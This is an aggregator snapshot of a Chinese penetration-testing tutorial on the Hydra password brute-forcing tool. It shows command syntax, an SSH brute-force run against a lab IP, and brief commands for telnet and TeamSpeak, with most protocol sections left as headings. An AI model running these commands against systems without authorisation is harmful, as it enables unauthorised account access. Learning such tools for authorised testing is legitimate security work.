16
【渗透测试】密码暴力破解工具——九头蛇(hydra)使用详解及实战
source link: https://blog.csdn.net/weixin_42350212/article/details/116419960
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
目录
九头蛇hydra
记得美国队长中的大反派hydra(九头蛇)组织吗?
今天介绍的这款渗透测试工具,也叫这个名字。
hydra是著名组织thc的一款开源的暴力破解密码工具,功能非常强大
kali下是默认安装的,几乎支持所有协议的在线破解。
密码能否破解,在于字典是否强大以及电脑的性能。
我们就介绍下,这个装备怎么用
语法:Hydra 参数 IP 服务
暴破ssh登录密码
为了测试方便,我们创建两个简单的字典文件,如下:
根据命令参数,组织参数格式如下:
root@kali:/mnt# hydra -L user.txt -P password.txt -t 2 -vV -e ns 192.168.154.131 ssh
因为字典数量比较少,我们可以轻易的破解成功,但是实际情况下,我们可能需要很久。
使用得到的用户名/密码登录服务器,登录成功
各种协议破解汇总
FTP协议破解
http协议破解
https协议破解
路由器破解
http-proxy协议破解
smb破解
Windows远程桌面
邮箱pop3
telnet破解
hydra ip地址 telnet -l 用户字典.txt -P 密码字典.txt -t 32 -s 23 -e ns -f -V
语音通讯工具teamspeak
hydra -l 用户名字典 -P 密码字典.txt -s 端口号 -vV ip teamspeak
cisco
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK